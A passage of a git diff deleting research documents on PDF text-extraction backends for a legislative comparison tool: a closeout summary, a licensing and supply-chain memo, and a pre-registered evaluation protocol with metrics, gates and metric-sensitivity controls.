docs/research/pdf-backend-bakeoff/validation/results/v05_boundary_scores.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v06_generated_and_hyphen.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v07_line_seam.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v08_display_split.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v09_wasm_flags.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v01_pymupdf_synthetic.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v02_geometry_ceiling.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v03_pdfium_rule_from_glyphs.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v04_boundary_sample.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v05_score_boundaries.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v06_generated_and_hyphen.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v07_line_seam.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v08_display_split.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/v09_wasm_flags.py delete mode 100644 docs/research/staffer-delivery/README.md delete mode 100644 docs/research/staffer-delivery/probes/README.md delete mode 100644 docs/research/staffer-delivery/probes/build_single_file.py delete mode 100644 docs/research/staffer-delivery/probes/dt_launcher.py delete mode 100644 docs/research/staffer-delivery/probes/exp1_imports.mjs delete mode 100644 docs/research/staffer-delivery/probes/exp1_xml_e2e.mjs delete mode 100644 docs/research/staffer-delivery/probes/exp_pdfjs_granularity.mjs delete mode 100644 docs/research/staffer-delivery/probes/native_baseline.py delete mode 100644 docs/research/staffer-delivery/probes/probe_static_app.py delete mode 100644 docs/research/staffer-delivery/probes/single-file/index.html delete mode 100644 docs/research/staffer-delivery/probes/static-app/index.html delete mode 100644 docs/research/staffer-delivery/probes/static-app/probe-worker.js delete mode 100644 docs/research/staffer-delivery/probes/static-app/probe.txt delete mode 100644 tests/data/p3/CPRT-119HPRT63305.pdf delete mode 100644 tests/data/p3/imageonly.pdf delete mode 100644 tests/data/p3/nongpo.pdf diff --git a/.gitignore b/.gitignore index ce47748b..96ab473c 100644 --- a/.gitignore +++ b/.gitignore @@ -104,37 +104,6 @@ docs/research/provision-matching/probes/form_*.html docs/research/provision-matching/probes/labels/ docs/research/provision-matching/probes/merged_labels.json -# The PDF bake-off's P2 holdout corpus: 88 govinfo documents, 16.4 MB, downloaded by -# probes/fetch_holdout.py. Same reasoning as /bills and bills_corpus above — bill source -# material is fetched, not vendored. What makes this safe here specifically is that -# results/holdout_membership.json (committed, and covered by the spike's frozen -# PRESERVED-MANIFEST.txt) records the govinfo package id, sha256 and byte count of every -# one of the 88 files, and the fetcher verifies each download against it. A re-issued or -# withdrawn package therefore fails loudly instead of being scored as the historical input. -# No trailing slash, per the #319 symlink reasoning above. -docs/research/pdf-backend-bakeoff/holdout - -# External-validity probe evidence (A46). Running any xNN probe rewrites its own evidence -# file, so after the A46 cleanup these reappear as untracked artifacts and a later `git add -A` -# would silently re-commit the working material that was retired. Ignored rather than left -# loose. They are regenerated by running the probe; git history holds the removed versions. -# -# The negations are the artifacts something actually READS or that a byte-frozen document -# cites — dropping one un-tracks a live gate input, so only change this list together with -# the consumer that justifies it. A new committed artifact needs a new negation here. -docs/research/pdf-backend-bakeoff/validation/external-validity/results/x*.json -# G2 reads this one; G6 defects ORACLE_INTEGRATION_NOT_VERIFIED without the other. -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x2_contract_assertions.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x26_control_oracle.json -# Cited as MEASURED by PRE-REGISTRATION.md, which is byte-frozen and can never be repointed. -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x00_design_pilot.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x02_oracle_reference_defects.json -# Named by retained METHODOLOGY_SURFACE files (cross_engine_control, run_hybrid, run_extended, -# reconstruct_extended_corrected), which may not be edited for a cosmetic reason. -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x09_skeleton_cross_engine.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x11_provenance_chain.json -!docs/research/pdf-backend-bakeoff/validation/external-validity/results/x13_x_arm.json - # Build artifacts. The project became buildable in #398, so `uv build` now produces # these where it never used to. `build/` matters beyond tidiness: some backends copy # the package's own .py files into it, and a directory holding Python that is neither diff --git a/docs/research/pdf-backend-bakeoff/CLOSEOUT.md b/docs/research/pdf-backend-bakeoff/CLOSEOUT.md deleted file mode 100644 index 8962ca72..00000000 --- a/docs/research/pdf-backend-bakeoff/CLOSEOUT.md +++ /dev/null @@ -1,79 +0,0 @@ -# PDF study closeout - -- Status: **closed.** The external-validity investigation is retired as inconclusive. No - PDF extraction architecture is recommended or validated by this directory. -- Closes the PDF research that began as two product questions: is PDFium a workable - foundation for comparing legislative PDFs, and can the Python comparison code run locally - inside a webpage. -- Every result below was measured on macOS / arm64. Nothing was tested on Windows. - -## Demonstrated - -| Capability | Evidence | Reproduce | -|---|---|---| -| The XML comparison pipeline runs under Pyodide with byte-identical canonical JSON and HTML output | [`staffer-delivery/README.md`](../staffer-delivery/README.md), re-verified 2026-08-11 with a negative control | `uv run python docs/research/staffer-delivery/probes/verify_parity.py`. Then run with `--mutate`: must report `MISMATCH` and exit 0, indicating the negative control was detected. Needs Node with the `pyodide` package | -| A self-contained, double-clickable HTML file booting the real Python engine was built and measured once | same, finding 4 | [`build_single_file.py`](../staffer-delivery/probes/build_single_file.py) with the [`single-file/`](../staffer-delivery/probes/single-file/) template. The built artifact is not committed and has not been rebuilt; it relies on a loader shim Pyodide does not support | -| PDFium in WebAssembly (`@embedpdf/pdfium`) extracts text and exposes the per-glyph API the extractor needs: char boxes, origins, font size and weight, matrices, hyphen and generated-char flags | [`RESULTS.md`](RESULTS.md) audit claim 2, [`validation/phase2/`](validation/phase2/) | [`probes/js/probe_wasm_textapi.mjs`](probes/js/probe_wasm_textapi.mjs), [`dump_pdfium_wasm.mjs`](probes/js/dump_pdfium_wasm.mjs), [`validation/phase2/g02_wasm_advance.mjs`](validation/phase2/g02_wasm_advance.mjs) | - -## Limited observations - -- **Migration parity, not accuracy.** PDFium-WASM reproduced current production output on the - audited set. That bounds migration risk; it does not rank extraction quality. -- **Narrow corpus.** The accepted population was effectively one typesetting class - ([`RESULTS.md`](RESULTS.md) audit claim 12). Confirmatory, hybrid and validation results are - compatibility and parity evidence on that population. -- **Zero egress is not achieved by CSP alone.** WebRTC, Speculation Rules and `window.open` - reach the network under the tested policy (audit claims 6 to 8). This bears directly on any - local-only browser channel. - -## Not supported - -- **No universal accuracy winner.** "PDFium-WASM is the best browser backend" was withdrawn by - the audit; pdfminer.six led the independent metrics and neither backend dominates. -- **No offline PDF comparison application was delivered.** The demonstrations above are - components. The PDF path has never run end to end in a browser. -- **No seam architecture was selected.** Hybrid versus corrected extended glyph remains open; - [`validation/`](validation/README.md) records how far the argument got. - -## The external-validity investigation: retired - -It was meant to supply a heading-level oracle and a fresh holdout. It did not. - -- **Adjudication controls failed.** The pre-registered N-A and N-B controls failed, with the - failures concentrated on the human route. The run cannot support any architecture claim. -- **Unresolved rule conflict.** PRE-REGISTRATION §5.6 says an N-B failure makes the run void; - §7 Rule 3 says any control failure means the evidence is insufficient. An earlier closeout - draft reported "void". Both lead to no architecture choice. The frozen text is not amended - here and the conflict is left open. -- **The decision stage never ran on committed evidence.** See #729 (no canonical decision - operation). -- **The heading definition is underdetermined** for running page furniture such as page-foot - bill designators, and the adjudicator applied it inconsistently. -- **All 20 controls are retired.** Their expected answers have been public in - `control_fixtures.json` since the design phase, and per-control answers from both routes were - later published on the branch of #728. A successor needs new controls. This document does - not undo those earlier disclosures. -- **Private evidence is not published.** Individual judgments, the answer key and the oracle - provenance are held privately. Scored outputs derived from them are not published here, - because they cannot be verified from public material alone. - -## Reusable code - -- Pyodide parity harness: `staffer-delivery/probes/verify_parity.py`, `parity_pyodide.mjs`. -- Single-file build: `staffer-delivery/probes/build_single_file.py`, `single-file/`. -- PDFium-WASM glyph extraction: `probes/js/dump_pdfium_wasm.mjs`, `probe_wasm_textapi.mjs`. -- Neutral glyph contract and backend adapters: `probes/contract.py`, `probes/backends/`. -- Extended-glyph reconstruction: `validation/phase2/pdfium_extended.py`, - `reconstruct_extended.py`, `contract_extended.py`. -- Egress probes: `probes/vectors2.js`, `redteam_egress2.py`, `phase4_webrtc.py`. - -## Next product task - -**Make the PDF parser's PDFium import lazy, so the engine imports under Pyodide with no stub.** -`src/deltatrack/parsers/pdf_text.py` imports `pypdfium2` at module scope. The XML path never -calls PDFium, but it reaches that import through module-level imports of -`parsers/pdf_anchors.py`, which imports `pdf_text`: at least `bill_tree.py` and the canonical -JSON formatter. Because every route ends at `pdf_text.py`, making the import lazy there covers -them all, where moving individual helpers would not. This is the remaining blocker for the -browser build and the prerequisite for plugging in a WASM PDFium backend. Tracked in #751; gate -it with `verify_parity.py`. diff --git a/docs/research/pdf-backend-bakeoff/LICENSING.md b/docs/research/pdf-backend-bakeoff/LICENSING.md deleted file mode 100644 index baba32c7..00000000 --- a/docs/research/pdf-backend-bakeoff/LICENSING.md +++ /dev/null @@ -1,145 +0,0 @@ -# Phase 6: licensing and distribution memo - -Recorded **separately from the technical score**, per the spec's instruction, so a -licensing conclusion can never be mistaken for a measurement and vice versa. - -Every license below was read from the **installed artifact** (package metadata and the -bundled `LICENSE` files), not from documentation or memory. Versions are the ones the -bake-off actually ran. - -> This is a project distribution-policy analysis, not legal advice. How licenses combine -> in a given distribution is a nuanced question this memo does not attempt to resolve. -> The operative project rule is the one the spec fixed before the bake-off ran: -> **DeltaTrack will not ship dependencies requiring AGPL compliance, absent a separate -> explicit licensing decision.** - -## The artifacts as measured - -| Component | Version | License (read from artifact) | Verified at | -|---|---|---|---| -| **DeltaTrack** | this tree | Apache-2.0 | `LICENSE` | -| **PDF.js** (`pdfjs-dist`) | 6.2.108 | Apache-2.0 | `package.json`, `LICENSE` | -| **PDFium-WASM** (`@embedpdf/pdfium`) | 2.15.0 | MIT (wrapper) — **but see the discrepancy below** | `package.json`, `LICENSE` | -| ⮑ bundled PDFium engine | fork `608d50ef` | BSD-3-Clause (PDFium Authors) | `LICENSE.pdfium` | -| **pdfminer.six** | 20260107 | MIT | package metadata | -| **pypdf** | 6.14.2 | BSD-3-Clause | package metadata | -| **pypdfium2** (incumbent) | 5.12.1 | BSD-3-Clause, Apache-2.0 | package metadata | -| **PyMuPDF** | 1.28.0 | *"Dual Licensed - GNU AFFERO GPL 3.0 or Artifex Commercial License"* | package metadata | - -## What this means for distributing a WASM binary - -The question the spec asks is specifically about **distribution**, because a client-side -tool triggers distribution obligations even where it triggers no network-service ones. - -**The permissive candidates (PDF.js, PDFium-WASM, pdfminer.six, pypdf) are all -compatible with shipping inside an Apache-2.0 project**, and all four impose the same -shape of obligation: retain the copyright notice and license text in the distributed -artifact. For a single-file HTML build that means the license texts must be embedded in -the bundle (a comment block or an about panel), not merely present in the source repo. -That is a build-step requirement, and it is cheap, but it is a real one and a single-file -artifact makes it easy to forget. - -Two specifics worth naming rather than glossing: - -- **PDFium-WASM is two licenses, not one.** The `@embedpdf` wrapper is MIT; the engine - inside the `.wasm` is BSD-3-Clause from the PDFium Authors. Both notices travel with - the binary. The shipped package carries them as separate files, which is the correct - signal that both apply. -- **PDFium vendors third-party code** (font, image and compression libraries) that this - memo did not enumerate, because the bundled `LICENSE.pdfium` covers only PDFium itself. - Before shipping a PDFium-WASM build, that transitive set needs an actual audit. Flagged - as an **open item**, not cleared. The incumbent `pypdfium2` already carries the same - question and its metadata hints at it ("dependency licenses"), so this is a - pre-existing obligation being inherited rather than a new one being taken on. - (`zlib` is confirmed present in the shipped `.wasm` by string inspection.) - -### Provenance problems found by the red-team audit, and not resolved - -These emerged after this memo was first written, and they are the reason -[`RESULTS.md`](RESULTS.md) now lists resolving them as a precondition for shipping rather -than a footnote. - -- **The declared source directory does not exist.** The published package's - `repository.directory` is `packages/pdfium`, and that path is absent from the repo's - current `main` (`packages/` holds core, engine, framework, plugin, viewer). The build - source for a 4.6 MB binary destined for congressional offices is therefore not locatable - at the address the package itself gives. -- **The licence chain disagrees with itself.** npm metadata and the bundled `LICENSE` say - **MIT** (© CloudPDF, Ji Chang); the upstream repo's own `LICENSING.md` says everything - under `packages/` is **Apache-2.0**. Both are permissive and neither blocks use, so this - is a diligence defect rather than a licensing risk — but it should be resolved in - writing before distribution, not assumed away. -- **The engine is a fork, not upstream.** The pinned artifact comes from - `embedpdf/runtime` at commit `608d50ef…`, not `pdfium.googlesource.com`. The fork's - patches have not been reviewed here. -- **Single maintainer**, 16 stars on the runtime fork (4.4k on the parent viewer repo). - -**In mitigation**, the build *is* pinned and checksummed: `engine-runtime-build.json` -carries a per-target SHA-256 for every artifact including `wasm32`, so a consumer can -verify they received the intended bytes. That is better hygiene than most WASM -redistributions and materially reduces the substitution risk — it does not address the -"can we rebuild it ourselves" question. - -### If the package disappeared - -DeltaTrack **could** vendor or rebuild an equivalent: PDFium is BSD-3 and builds to WASM. -It is not a trivial undertaking — depot_tools, `gn`/`ninja`, an Emscripten toolchain, plus -auditing whatever the `embedpdf/runtime` fork changes — but it is a known, bounded -engineering task rather than a dependency that cannot be replaced. The realistic interim -mitigation is to **vendor the verified `.wasm` and its checksum into the repo** rather than -resolve it from npm at build time. - -### PyMuPDF, and why it never enters the decision tree - -PyMuPDF's own metadata states the dual license outright. Under the project rule it is a -**ceiling reference only**, and its score in the results must not be read as a -recommendation. - -On the AGPL §13 question the spec raises: a purely client-side tool that a staffer runs -locally arguably does not engage the network-interaction clause at all, since there is no -remote user interacting with it over a network. **But that argument is irrelevant to this -decision**, because §13 is not the binding constraint — **distribution** is. Shipping the -WASM binary to a congressional office is conveying the work, and the AGPL's source- -provision obligations attach to conveyance regardless of §13. Reaching for the §13 -argument would be answering a question nobody asked. - -The obligation would also **pass downstream to any tool that consumes DeltaTrack's -output** (ADR 0005), which is the more -consequential half: a licensing choice made here for DeltaTrack's convenience becomes a -constraint on a separate product's distribution. That is exactly the kind of decision -that should be made deliberately by the maintainer rather than absorbed as a side effect -of a backend choice. - -Revisiting stays possible and stays cheap to state: an explicit licensing decision, or a -commercial license from Artifex. Neither is in scope here. - -## The number that prices a PDFium-WASM effort - -The spec's main reason for running PyMuPDF at all is to price the gap between the best -achievable score and the best *shippable* one. **The measured gap is essentially zero**, -and that is the finding: see [`RESULTS.md`](RESULTS.md) for the figures. PyMuPDF does not -outperform the permissive candidates on this corpus by a margin that would justify an -AGPL-compliance obligation or a commercial-license purchase. - -That result also dissolves the question the spec expected to be hardest. It had assumed a -PDFium-WASM effort might need funding and that PyMuPDF's score would tell us what it was -worth. In fact a credible PDFium-WASM build **already exists, is MIT/BSD-3, and already -exposes the FFI the engine needs** — so there is no engineering effort to price. - -## Recommendation - -**On licensing grounds alone, all four permissive candidates are shippable**, and PyMuPDF -is excluded by project policy rather than by any measured deficiency. - -But licence text is not the whole of a distribution decision. On **supply-chain** grounds -the four are not equivalent, and the ranking is close to the inverse of the technical one: -pdfminer.six and pypdf come from long-established PyPI projects and add no binary, PDF.js -is a Mozilla project with a decade of deployment, and is a -single-maintainer redistribution of a PDFium **fork** whose declared source path is -missing. For a tool being handed to congressional offices, that difference deserves -weight alongside the accuracy numbers. - -Two build-time obligations to carry into whichever is chosen: - -1. Embed the required notices **in the distributed artifact**, not just the repo. -2. Audit PDFium's vendored third-party licenses **before** shipping a PDFium-WASM build. diff --git a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION-CONFIRMATORY.md b/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION-CONFIRMATORY.md deleted file mode 100644 index 3806b610..00000000 --- a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION-CONFIRMATORY.md +++ /dev/null @@ -1,795 +0,0 @@ -# Pre-registration: narrow confirmatory run - -- Status: **frozen protocol. Nothing has been run against it.** Revised 2026-08-05 after - methodological review of the first proposal, then **amended 2026-08-05 before execution** - on four points: per-metric sabotage controls (B0), an unfillable holdout stratum (P2 #8), - gold-sample blinding, and an inside-the-sandbox known-bad control. All four were amended - **with no results visible**, which is why they are amendments and not deviations — - the [DEVIATIONS](#deviations) table opens when the first score is produced. -- Supersedes the 2026-08-05 *proposal* of the same name. It supersedes nothing else. - [`PRE-REGISTRATION.md`](PRE-REGISTRATION.md) remains the record of what the exploratory - spike committed to; [`RESULTS.md`](RESULTS.md) remains the authoritative record of the - exploratory spike and its audit, and **is not to be rewritten by this run**. -- Once execution starts, every change to this document goes in - [`results/DEVIATIONS.md`](results/) — see [§ Deviations](#deviations). - -## What the exploratory record keeps saying, unchanged - -This run does not edit, delete or "correct" the exploratory findings. `RESULTS.md` keeps, -verbatim: the original findings as published; the adversarial audit; the withdrawn -"PDFium-WASM is the best backend" claim; T4 reclassified as production migration parity; -pdfminer's stronger showing on incumbent-independent metrics; the repaired-mode bias toward -PDFium; all nine post-registration methodology changes; the narrowed security claim; the -corpus-diversity limitation; and the `@embedpdf/pdfium` provenance follow-ups. - -**The exploratory spike is exploratory.** This run is a prospective replication under a -protocol frozen in advance, plus a first look at data none of these probes has ever seen. - -## The three concerns, and why they are never combined - -| Concern | Reference | Licenses the conclusion | -|---|---|---| -| **A. Production migration parity** | today's pypdfium2 output | "safe to swap without changing what staffers see" | -| **B. Independent document accuracy** | XML and adjudicated page images, never PDFium | "reads the document correctly" | -| **C. Security / egress** | network-layer observation | "cannot transmit under policy P / in environment E" | -| **D. Performance** | wall clock on an idle machine | "fast enough, and how much faster" | -| **E. Bundle / architecture** | built browser artifacts | "costs this much to deliver" | -| **F. Supply-chain release readiness** | upstream sources | "can be adopted and re-derived" | - -**No composite score. No single "best backend" table. No verdict that spans two rows.** -Substituting an A result for a B conclusion is what produced the withdrawn headline, and it -is the single failure this document exists to prevent. - -**Candidates: `pdfium-wasm` and `pdfminer.six`.** pypdf failed and PyMuPDF is -policy-excluded (AGPL); re-running them adds noise. **PDF.js is out of A and B** — its -exploratory score belongs to `getTextContent()`, not to the library, and the operator-list -adapter that would fix that is not being built (see -[§ Unresolved design choices](#unresolved-design-choices)). It stays in **E** only, where -its artifact is already installed and the measurement is nearly free. - ---- - -# Populations - -Three, kept apart in every table. - -## P1 — replication corpus (52 documents, 30 bills) - -The existing corpus, derived at runtime from `tests/corpus/*` by -`score_phase1.corpus_documents()`. **This is no longer unseen data**: it has been inspected, -methodology was tuned against problems found in it, and the backend results are known. - -**It can only answer one question: do the exploratory findings survive the frozen -protocol?** Nothing measured on P1 generalizes on its own. - -## P2 — holdout corpus (target 12 bills, never scored by any probe) - -### Frozen selection procedure - -Executed **before** either candidate runs, output committed to -`results/holdout_membership.json`, and never revised afterwards. - -1. **Frame.** govinfo BILLSTATUS for Congresses 113–119, all bill types, via - `tools/fetch_govinfo.py`. A bill is eligible if it has **≥ 2 text versions that each - carry both PDF and XML** at `content/pkg`. -2. **Exclusions**, enumerated into the membership file at selection time rather than - assumed: the 30 replication bills; every non-corpus probe fixture (`118-s-4795`, - `CRPT-118srpt198`, the nine subcommittee prints); and **every bill present in the main - checkout's `bills/` working tree**, because that material has been looked at. -3. **Strata**, filled in this fixed order, one bill per row unless stated: - - | # | Stratum | Bills | Diversity axis it buys | - |---|---|---|---| - | 1 | Non-appropriations House bill, 118th or 119th | 2 | bill type | - | 2 | Non-appropriations Senate bill | 2 | bill type + chamber | - | 3 | Joint resolution (`hjres` / `sjres`) | 1 | bill type | - | 4 | Appropriations bill from 113 / 114 / 116 / 119 | 2 | Congress (under-represented in P1) | - | 5 | Bill whose longest version is **< 20 printed pages** | 2 | document length | - | 6 | Bill whose longest version is **> 400 printed pages** | 1 | document length | - | 7 | Bill with a watermarked Senate print (`rs` / `pcs`) | 1 | watermark / layout | - | 8 | Bill with a chamber-crossing amendment print (`eah` / `eas`) | 1 | typeface class — DeVinne-Italic, only 5 documents in P1 | - - **Stratum 8 changed, because the original was unfillable by P2's own rule.** It asked for - a conference report or a committee print. Neither is a bill: they carry no bill XML and - have no adjacent-version pairs, so neither can satisfy "≥ 2 versions each with PDF and - XML", and a stratum that can never fill would have silently spent the adequacy budget. - **Conference reports and committee prints move to P3a**, where they can be tested for - robustness and safe failure without an XML reference. - - **Honest limit on the typeface axis:** the BILLS collection offers effectively three - typesetting classes — DeVinne, DeVinne-Italic and NewCenturySchlbk-Roman (enrolled) — - and **P1 already contains all three**. P2 can add new *bills* within those classes and - can thin out P1's concentration; it cannot add a fourth class. Any GPO production class - beyond those three is reachable only through P3, without XML. - -4. **Within a stratum**: candidates sorted by bill id, permuted with seed **20260805**, and - the first that satisfies the two-dual-format-versions rule is taken. Ties are broken by - the permutation, never by inspection. -5. **Recorded before scoring**: bill id, package ids, version codes, page counts, SHA-256 of - every file, and which stratum each bill filled. - -### Adequacy rule, pre-committed - -- **≥ 8 of the 8 strata filled** → holdout supports a generalization claim. -- **5–7 filled** → holdout is reported, and the claim is *"replicates, and extends to the - classes actually sampled"*, with the unfilled strata named. -- **< 5 filled, or the fetch fails** → **the holdout is declared unobtainable**, no - generalization claim is made, and the whole run is downgraded to - **locked-protocol replication**. That downgrade is written into the results headline, not - a footnote. - -### The rule that makes a holdout a holdout - -**No holdout result may change a metric, threshold, normalization, parameter, adapter, -repair rule or population.** A backend crashing on a holdout document is a *result*, not a -bug to fix mid-run. If something must change anyway, it is a deviation and every affected -score is re-labelled non-confirmatory. - -## P3 — non-corpus robustness probes (renamed) - -The exploratory "Tier B" section is renamed **non-corpus robustness probes**, because -eleven of its twelve fixtures are published GPO Tier A prints. It is not a pre-publication -test and never was. - -| Sub-population | Fixtures | What it can support | -|---|---|---| -| P3a real, non-corpus GPO | the existing 12, **plus one real conference report (`CRPT-*`) and one real committee print (`CPRT-*`)**, both required | robustness and safe failure across GPO print classes. **No accuracy metric** — these have no XML reference and are not bills | -| P3b synthetic degradations | a rasterized (image-only) corpus PDF; a non-GPO producer PDF generated locally | **safe-failure only, never accuracy** | - -**Source classes that remain unvalidated after this run**, listed in the results as a -standing section rather than a caveat: chair's marks; discussion drafts; genuinely -pre-publication committee documents; Word-generated legislative drafts; real (not -synthesized) image-only or scanned PDFs; conference-report and committee-print layouts as -*accuracy* claims, since P3a can only test robustness and safe failure on them; other -non-GPO PDFs. Obtaining real pre-publication material needs a congressional -contact and is outside what any protocol here can arrange. - -### Safe failure is a first-class gate - -For every P3 fixture, record which of three things the production entry point does: - -| Outcome | Meaning | -|---|---| -| **DECLINES** | raises `UnsupportedLayoutError` — the safe outcome | -| **ANSWERS** | returns a diff with anchors | -| **ANSWERS ANCHORLESS** | returns a diff with **zero** anchors — a confident wrong answer | - -**Gate S-1: no fixture may land in ANSWERS ANCHORLESS.** The exploratory run produced -exactly that state once (3,468 amount entries against the XML's 0, on an enrolled pair -reached by bypassing the guard), which is why this is a gate and not an observation. - ---- - -# Concern A — production migration parity - -**Question.** If we replace pypdfium2 with candidate X, does any output production currently -returns to users change? - -**Reference: today's native pypdfium2 through the identical downstream pipeline.** That is -correct *here* and nowhere else — this section is about migration compatibility, not -correctness. - -### Frozen population and strata - -**All 15 consecutive corpus pairs, always all 15 visible**, in two strata: - -| Stratum | N | Role | -|---|---|---| -| **Production-accepted** | 13 | **the migration gate** | -| **Production-declined** (`115-hr-5895/4→5`, `118-hr-4366/5→6`) | 2 | unsupported-layout **diagnostics**, scored with the guard bypassed | - -Membership is derived at runtime from `compare/pdf.py::_is_unnumbered_layout`, never -hardcoded: if production's guard changes, the strata change with it and the run says so. -Holdout pairs (P2) are scored under the same rules and reported separately. - -### Frozen metrics - -| ID | Metric | Definition | -|---|---|---| -| A1 | Amount identity | `Counter[(old, new, kind)]` over all `amount_entries` equals the incumbent's, exactly | -| A2 | Change identity | `Counter[(change_type, norm(old), norm(new))]` equals the incumbent's, exactly | -| A3 | Amount F1 | precision / recall / F1 of the A1 multiset, for when A1 fails | -| A4 | Full-text identity | SHA-256 of `pdf_full_text` output equals the incumbent's | -| A5 | Line-number identity | exact `(page, line)` set equals the incumbent's | - -`norm()` is frozen as the current `score_phase2.norm_text` (whitespace runs, -`normalize_glyphs`, soft-hyphen rejoin, margin line numbers, U+FFFD removal). -**Widening it later is a protocol violation**, because every widening inflates agreement. - -A5 moved here from the exploratory Concern-B metric set: its reference is the incumbent, so -it is a parity measurement, not an accuracy one. - -### Frozen gates - -| Gate | Threshold | Name | -|---|---|---| -| **A-1** | A1 holds on **13/13** production-accepted pairs | production migration parity | -| **A-2** | A2 holds on **13/13** production-accepted pairs | production migration parity | -| **A-3** | A4 holds on all production-accepted documents | production migration parity | -| **A-4** | A1 **and** A2 hold on **15/15** including the 2 declined | *backend equivalence beyond supported production behavior* | - -**Pass = A-1, A-2 and A-3.** A-4 is reported separately and is explicitly **not** production -migration parity — the two declined pairs are not staffer-visible output and must not decide -whether a migration is safe today. A candidate that passes A-1 but fails A-2 is reported as -*"money-safe, segmentation-divergent"*, which is a real intermediate state, not a pass. - -### Repair mode for Concern A - -**Primary: `repaired` — the mode we would actually ship.** A deterministic backend adapter -normalizing a known source-library quirk is part of the intended production implementation; -production already does the equivalent for the text API in `normalize_raw`. -**`strict` is reported as a diagnostic on every metric.** A1/A2 are mode-identical anyway, -so this costs nothing and it stops the migration gate from being graded against a mode -nobody would ship. - ---- - -# Concern B — independent document accuracy - -**Question.** Which candidate most accurately recovers the underlying legislative document, -when PDFium is not the reference? - -**No metric in this section may take a PDFium-derived value as ground truth.** Excluded by -name: incumbent breadcrumb agreement; incumbent line-number sets; T4; and any expected value -computed by running PDFium. If a metric cannot be computed without PDFium, it does not -belong here. - -**Reported separately for P1 (replication) and P2 (holdout). Never pooled.** - -### Frozen population - -- **Production-accepted documents** are the primary population. Enrolled documents are - reported separately and never merged in. -- **Stratified by body font** (`DeVinne` / `NewCenturySchlbk-Roman` / `DeVinne-Italic`), - because the audit found P1 is effectively one typesetting class and an aggregate hides it. -- **Per-bill results are mandatory.** One bill supplies 6 of 52 P1 documents. - -### Frozen metrics - -| ID | Metric | Reference | Definition | -|---|---|---|---| -| B1 | Text recovery F1 | XML body | Multiset token F1 after `align_to_body` edge-trim, both frozen as implemented today. Unaffected by DeltaTrack#11 — the reference is a raw `extract_text_content` walk that includes `` text | -| B2 | **Heading-label recovery** F1 | XML tree | **Level-agnostic**: PDF anchors of kind {account, agency, grouping} against XML labels of level {account, agency, heading}; upper-cased, commas and periods stripped | -| B3a | Line-number self-consistency | the document itself | Per page: recovered margin numbers form a gap-free run `1..n`, and `n` equals the count of numbered body lines. **No external reference** | -| B3b | Line-number exactness | adjudicated page images | Exact `(page, line)` match on gold-sample pages only | -| B5 | **Amount → heading association** | XML tree | For amounts present on **both** sides, F1 over the multiset of `(amount, nearest heading-ish ancestor label)` pairs. Restricting to shared amounts isolates *association* from *detection* | -| B6 | **Parent/child heading correctness** | XML tree | For each PDF heading whose label matches an XML heading, accuracy of its immediate heading-ish parent's label against the XML node's | -| B7 | Independent-extractor corroboration | PyMuPDF `get_text()` | Sampled amounts appear in an unrelated extractor's text on the side claimed. **Corroboration, not ground truth** | -| B8 | Gold-sample agreement | adjudicated page images | Per-item agreement on the gold set (see below) | - -**B2 measures heading-label recovery, not structural accuracy.** A backend can find every -heading and attach them all wrongly. B5 and B6 exist because that failure is the one with a -product consequence: heading attachment is what puts an amount under the right agency and -account in the financial tables. - -**B2 is level-agnostic by pre-commitment, and this is load-bearing.** A level-by-level -comparison produced a *false reversal* during the audit (PDFium appearing to over-detect -accounts 46-to-27) because the two pipelines name the same objects differently — the XML's -`agency` holds `Military construction, air force`, which the PDF calls an `account`. - -**DeltaTrack#11 scope, stated per metric rather than globally:** B2, B5 and B6 read the -parser tree, which drops ``; **25 of the 52 P1 XMLs carry one**. Those documents -are reported in their own stratum for B2/B5/B6 and are excluded from the primary figure. -B1 and B3 are unaffected. - -**B2 is new code at population scale.** The exploratory 0.5864 / 0.6253 heading figures are -means over the **six** documents in `redteam_ablation.py`, not over 52. Confirmatory B2 will -not be numerically comparable to them, and the results must say so rather than appear to -replicate a number it never measured. - -### B0 — harness sensitivity controls (a gate on the metrics, not on the backends) - -A metric that cannot distinguish good extraction from bad cannot rank anything, and an -all-green sweep looks identical either way. - -**One uniform sabotage is not enough.** A 5 % random glyph dropout garbles text but barely -touches heading attachment, so a metric that survives it may be blind rather than robust — -and declaring it void on that evidence is itself a false negative. **Each metric therefore -gets its own sabotage, injecting the specific fault that metric claims to catch**, applied -to `pdfium-wasm` glyph output with seed 20260805. Glyph field indices are -`contract.GLYPH_FIELDS`. - -| ID | Targets | Injected fault | Must happen | -|---|---|---|---| -| **S1** | B1 | delete 5 % of glyphs, uniformly at random | B1 falls | -| **S2** | B2 | on every line whose max `font_size` exceeds the page's dominant body size, set all its glyphs to the line median — collapsing the small-caps size band | B2 falls | -| **S3** | B3a | delete the leading margin-number glyph run on 5 % of numbered lines | B3a falls | -| **S4** | B5 | shift heading lines' `baseline`/`y0`/`y1` down one body line-height: headings keep their text, but attach to the wrong block | B5 falls **while B2 moves less than 0.020** | -| **S5** | B6 | delete agency-level heading lines only, keeping accounts, so their children reparent | B6 falls **by more than B2 does** | -| **S6** | B7 | relabel a sampled amount's side (old ↔ new) | the corroboration check flags it | -| **S7** | B8 | the ten corrupted gold items (wrong amount, wrong heading, wrong line number) | the scorer flags all ten | -| **SA1** | A1 | perturb one digit of one amount | A1 **fails** | -| **SA2** | A2 | delete one change block's glyphs | A2 **fails** | -| **SA3** | A4 | delete a single glyph | A4 **fails** | - -**The discriminating requirements on S4 and S5 are the point, not decoration.** S4 leaves -every heading label intact and only moves where it sits; if 